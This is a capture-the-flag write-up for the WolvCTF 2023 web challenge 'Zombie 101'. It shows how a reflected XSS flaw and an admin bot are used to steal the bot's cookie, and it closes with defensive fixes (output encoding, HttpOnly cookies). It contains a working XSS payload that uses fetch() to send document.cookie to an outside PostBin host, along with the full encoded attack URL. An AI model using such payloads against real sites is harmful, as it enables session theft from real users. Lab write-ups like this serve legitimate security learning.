# Zombie 101

### Category: Web  
### Points: 100

In the challenge description we are given a link to a website with two input
fields.  
It's also noted in the description that this challenge is a classic "steal the
admin's cookie" challenge.

Given two input boxes for this challenge, I immediately test for an XSS
vulnerability in the first box and, unsurprisingly, I get a pop-up with:  
```html  
<script>alert(0)</script>  
```  
The second form allows you to pass a URL to the 'admin' bot, and it will visit
that page.  
The source code is given to us and we can see the restrictions of the URL we
pass in:

```javascript
// Validates the URL submitted for the admin bot.
// Returns an error message, or null when the URL is accepted.
const validateRequest = (req) => {
  const url = req.query.url
  if (!url) {
    return 'Hmmm, not seeing a URL. Please try again.'
  }

  let parsedURL
  try {
    parsedURL = new URL(url)
  }
  catch (e) {
    return 'Something is wrong with your url: ' + escape(e.message)
  }

  // Only http(s) URLs are accepted.
  if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') {
    return 'Our admin is picky. Please provide a url with the http or https protocol.'
  }

  // The bot only visits pages on the challenge's own host.
  if (parsedURL.hostname !== req.hostname) {
    return `Please provide a url with a hostname of: ${escape(req.hostname)} Hmmm, I guess that will restrict the submissions. TODO: Remove this restriction before the admin notices and we all get fired.`
  }

  return null
}
```

We can craft a simple exploit to steal the admin's cookie and send it to
our own server:

```html
<script>
fetch('https://www.toptal.com/developers/postbin/xxxx-xxxx?cookie='+document.cookie,{headers: {'Accept': ''}})
  .then(response => response.text())
  .then(text => console.log(text))
</script>
```

After injecting this payload into the first input box, we get a URL to give to
the zombie page for the admin to check out.

Submitting this URL:

```  
# https://zombie-101-tlejfksioa-ul.a.run.app/visit?url=https%3A%2F%2Fzombie-101-tlejfksioa-ul.a.run.app%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527https%253A%252F%252Fwww.toptal.com%252Fdevelopers%252Fpostbin%xxxx-xxxx%253Fcookie%253D%2B%2527%252Bdocument.cookie%252C%257Bheaders%253A%2B%257B%2527Accept%2527%253A%2B%2527%2527%257D%257D%2529%2B.then%2528response%2B%253D%253E%2Bresponse.text%2528%2529%2529%2B.then%2528text%2B%253D%253E%2Bconsole.log%2528text%2529%2529%253C%252Fscript%253E
```

Gives us the flag in the response from PostBin:

```  
cookie: flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261}  
```  
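
The hostname check in `validateRequest` only keeps the bot on the site; it does nothing about a script that the site itself reflects from the `show` parameter. The following added example (not code from the challenge or from the original writeup) shows the two fixes that break this chain: HTML-encoding the reflected value and marking the cookie `HttpOnly`. The function names, the `<div>` wrapper and the host `app.example` are assumptions.

```javascript
// Added example; all names here are hypothetical, sample values are constructed.

// The same-host rule from validateRequest, reduced to a boolean.
function passesHostCheck(url, expectedHost) {
  let parsed;
  try { parsed = new URL(url); } catch (e) { return false; }
  const isHttp = parsed.protocol === 'http:' || parsed.protocol === 'https:';
  return isHttp && parsed.hostname === expectedHost;
}

// Assumed vulnerable rendering: the `show` value goes into the page unchanged.
function renderUnsafe(show) {
  return `<div id="msg">${show}</div>`;
}

// Encode the characters that can start markup or close an attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: the value can only ever appear as text.
function renderSafe(show) {
  return `<div id="msg">${escapeHtml(show)}</div>`;
}

// Set-Cookie value for the bot's cookie. HttpOnly keeps it out of
// document.cookie, so script running in the page cannot read it.
function hardenedCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed sample: the alert probe from the writeup, reflected via ?show=
const HOST = 'app.example';
const probe = '<script>alert(0)</script>';
const submitted = `https://${HOST}/zombie?show=${encodeURIComponent(probe)}`;
const show = new URL(submitted).searchParams.get('show');

console.log('passes host check:', passesHostCheck(submitted, HOST));
console.log('unsafe:', renderUnsafe(show));
console.log('safe:  ', renderSafe(show));
console.log('cookie:', hardenedCookie('flag', 'placeholder value'));
```

Output encoding removes the injection point; `HttpOnly` limits the damage if another injection point is found later.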

Original writeup (https://github.com/marshallstone/ctf-writeups/blob/main/WolvCTF-2023/Web-Zombie101.md).